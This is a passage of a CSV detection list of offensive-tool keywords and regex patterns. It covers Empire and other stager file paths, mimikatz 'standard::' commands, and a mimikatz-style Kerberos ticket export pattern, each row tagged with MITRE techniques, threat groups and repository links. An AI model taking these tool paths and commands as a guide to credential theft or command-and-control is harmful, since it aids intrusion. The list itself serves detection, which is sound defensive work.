T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60242"
"*stagers/*/get_sysinfo.py*",".{0,1000}stagers\/.{0,1000}\/get_sysinfo\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60243"
"*stagers/*/rc4.py*",".{0,1000}stagers\/.{0,1000}\/rc4\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60244"
"*stagers/mytest_reverse_http.bin*",".{0,1000}stagers\/mytest_reverse_http\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60245"
"*stagers/mytest_reverse_https.bin*",".{0,1000}stagers\/mytest_reverse_https\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60246"
"*stagers/x64_mytest_reverse_http.bin*",".{0,1000}stagers\/x64_mytest_reverse_http\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60247"
"*stagers/x64_mytest_reverse_https.bin*",".{0,1000}stagers\/x64_mytest_reverse_https\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60248"
"*Stagers\ExeStager\*",".{0,1000}Stagers\\ExeStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","60249"
"*Stagers\SvcStager\*",".{0,1000}Stagers\\SvcStager\\.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","60250"
"*stagerx64.bin*",".{0,1000}stagerx64\.bin.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","60251"
"*Staging_w_padding_3.5_x64-cleaned.bin*",".{0,1000}Staging_w_padding_3\.5_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60252"
"*Staging_w_padding_3.5_x86-cleaned.bin*",".{0,1000}Staging_w_padding_3\.5_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60253"
"*Staging_w_padding_4.X_x64-cleaned.bin*",".{0,1000}Staging_w_padding_4\.X_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60254"
"*Staging_w_padding_4.X_x86-cleaned.bin*",".{0,1000}Staging_w_padding_4\.X_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60255"
"*Staging_w_padding_v3_x64-cleaned.bin*",".{0,1000}Staging_w_padding_v3_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60256"
"*Staging_w_padding_v3_x86-cleaned.bin*",".{0,1000}Staging_w_padding_v3_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60257"
"*Staging_w_padding_v4_x64-cleaned.bin*",".{0,1000}Staging_w_padding_v4_x64\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60258"
"*Staging_w_padding_v4_x86-cleaned.bin*",".{0,1000}Staging_w_padding_v4_x86\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","60259"
"*stamparm/fetch-some-proxies*",".{0,1000}stamparm\/fetch\-some\-proxies.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","1","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","60260"
"*standard::answer*",".{0,1000}standard\:\:answer.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60261"
"*standard::base64*",".{0,1000}standard\:\:base64.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60262"
"*standard::base64*kerberos::list /export*",".{0,1000}standard\:\:base64.{0,1000}kerberos\:\:list\s\/export.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","60263"
"*standard::cd*",".{0,1000}standard\:\:cd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60264"
"*standard::cls*",".{0,1000}standard\:\:cls.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60265"
"*standard::coffee*",".{0,1000}standard\:\:coffee.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60266"
"*standard::exit*",".{0,1000}standard\:\:exit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60267"
"*standard::hostname*",".{0,1000}standard\:\:hostname.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60268"
"*standard::localtime*",".{0,1000}standard\:\:localtime.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60269"
"*standard::log*",".{0,1000}standard\:\:log.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60270"
"*standard::sleep*",".{0,1000}standard\:\:sleep.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60271"
"*standard::version*",".{0,1000}standard\:\:version.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","60272"
